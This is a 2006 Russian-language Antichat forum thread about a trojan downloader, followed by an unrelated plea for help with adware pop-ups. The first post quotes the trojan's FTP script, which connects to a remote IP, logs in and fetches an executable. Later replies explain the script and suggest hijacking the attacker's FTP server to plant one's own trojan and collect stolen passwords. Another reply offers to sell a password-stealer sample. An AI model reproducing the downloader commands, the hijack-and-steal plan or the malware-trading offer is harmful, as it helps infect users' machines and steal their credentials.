ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Trojan Downloader
  #1  
Старый 09.03.2006, 19:27
Аватар для De_X
De_X
Banned
Регистрация: 30.11.2005
Сообщений: 95
Провел на форуме:
279326

Репутация: -12
По умолчанию Trojan Downloader

Люди! Короче у меня Каспер орёт и пишет что найде Trojan Downloader! Я через каспера нашёл трой и посмотрел из чего он написан!


open [Тут IP затем 30294]
user 1 1
get winfifggf.exe
quit

Что этот троян делает? и как можно обратить такой для свойх целей?
 
Ответить с цитированием

  #2  
Старый 09.03.2006, 20:06
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Да троян это тебе дают его ты его запускаешь и он с указанного сайта перекидывает трой на твою такчку а потом запускает.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #3  
Старый 09.03.2006, 20:14
Аватар для De_X
De_X
Banned
Регистрация: 30.11.2005
Сообщений: 95
Провел на форуме:
279326

Репутация: -12
По умолчанию

А вот что он тырит с меня этот троян? 30294 чё эти цыфры ознаяают? и как такойже сделать только в свою пользу?
Почему так распрашиваю потому что конкретно взялся за дело терь только изучаю виры и трояны! поэтому ного вопросов!
 
Ответить с цитированием

  #4  
Старый 09.03.2006, 21:19
Аватар для A110ut
A110ut
Постоянный
Регистрация: 31.12.2005
Сообщений: 605
Провел на форуме:
4349433

Репутация: 661


По умолчанию

30294 ето пароль на твой компутер! именно его троян и тЫрит!
чтобы "обернуть ето себе на пользу" есть два варианта действий
1 - незамедлительный формат C
2 - прекращаешь страдать х***ей прямо сейчас

зы:
на заметку юным натуралистам
за 10вмз предоставлю для исследований прекрасный екземпляр пинчевского сервака. по вопросам оптовой закупки обращаться в приват =)
 
Ответить с цитированием

  #5  
Старый 10.03.2006, 18:53
Аватар для Elekt
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию

Цитата:
Сообщение от De_X  
open [Тут IP затем 30294]
user 1 1
get winfifggf.exe
quit

Что этот троян делает? и как можно обратить такой для свойх целей?
Мне вообще интересно, как может новичёк выдрать стоко инфы из троя, и при этом не знать, что это значит

Это троян-Downloader, те в него встроена лишь фунцция закачки чего-нить. Он лезет в интернет по указанному айпи на указанный порт(30294). Судя по синтаксису запроса, это ФТП-сервер. Трой авторизуется под именем юзера "1" и под паролем "1". Затем скачивает к тебе на комп основного тело трояна "winfifggf.exe".

Впринципе, он способен тут же его запустить ФТП-командой "!winfifggf.exe"(кажись, так)
Либо через реестр после перезагрузки.

Как это можно использовать?
Можно зайти на этот ФТП-сервак через какой-нить клиент (например, тотал-командер). Если очень повезёт, у тебя будут прова на запись.
Тогда делаешь своего троя и заменяешь родного на своего =] Гы..
И забираешь отчеты с паролями со своего мыла.

Последний раз редактировалось Elekt; 10.03.2006 в 18:56..
 
Ответить с цитированием

  #6  
Старый 11.03.2006, 00:17
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

Цитата:
Судя по синтаксису запроса, это ФТП-сервер. Трой авторизуется под именем юзера "1" и под паролем "1".
У фтп сервера, если читать RFC, видно такие команды
USER username
PASS password

а не USER username password,
далее
команды GET вообще несуществует, есть RETR и STOR
и команды OPEN тоже нет

однако, возможно это сценарий для ftp-клиента в Windows (стардартного), но никак не для фтп сервера

Цитата:
как может новичёк выдрать стоко инфы из троя
А вот так, надо хотябы как-то шифровать строки, чтобы их видно небыло в плейнтекст. А не на делфи мучить комп)

Последний раз редактировалось KEZ; 11.03.2006 в 00:19..
 
Ответить с цитированием

Download. Troyan
  #7  
Старый 26.03.2006, 18:20
Аватар для Elmizo
Elmizo
Новичок
Регистрация: 25.03.2006
Сообщений: 8
Провел на форуме:
10109

Репутация: 1
По умолчанию Download. Troyan

Уважаемые форумчанею. Помогите избавиться от всплывающих окон эксплоера. Гуляя по сайтам, мой антивирус предупреждал меня о "Download. Troyan", но несмотря на это я все-равно открывала странички и закачивала необходимые мне файлы. Теперь каждую минуту ко мне лезет реклама, даже если все окна закрыты. Я проверяла компьютер:
Spybot - Search & Destroy
Ad-Aware SE Personal
Registry Mechanic
HijackThis

Все они находят проблему, якобы удаляют опасные файлы, но потом оповещают меня о том, что неудалили, т.к. в памяти где то они остались. Ничего не помогает. Я блокировала всплывающие окна, вносила в черный список, удалила все куки, временные файлы и исключения- ничего не помогает.
Что мне делать?
Адреса всплывающих окон начинаются и заканчиваются на "http://www...................com/normal/yyy102.html"
 
Ответить с цитированием

  #8  
Старый 26.03.2006, 18:29
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

Цитата:
Я проверяла компьютер
Чел, ты ошибся буквой - проверял а не "проверяла"

Цитата:
Помогите избавиться от всплывающих окон эксплоера.
http://stopie.org.ru/
 
Ответить с цитированием

  #9  
Старый 26.03.2006, 20:08
Аватар для Elmizo
Elmizo
Новичок
Регистрация: 25.03.2006
Сообщений: 8
Провел на форуме:
10109

Репутация: 1
По умолчанию

Почему "проверял"? Я- "она", я проверяла.
Ссылочка не открывается.
 
Ответить с цитированием

  #10  
Старый 26.03.2006, 21:25
Аватар для =Be$=
=Be$=
Постоянный
Регистрация: 21.01.2006
Сообщений: 310
Провел на форуме:
1675027

Репутация: 237
Отправить сообщение для =Be$= с помощью ICQ
По умолчанию

Вот сюда зайди http://stopie.org.ru/links.htm (там только для Firefox)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
trojan, botnet, worm, spam and flood. lexa О Работе 0 30.01.2006 21:47
3127 trojan => W32.Mydoom WerMRolenT Windows 1 02.01.2006 12:35
Вирус? PSalm69 Болталка 7 16.11.2005 13:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ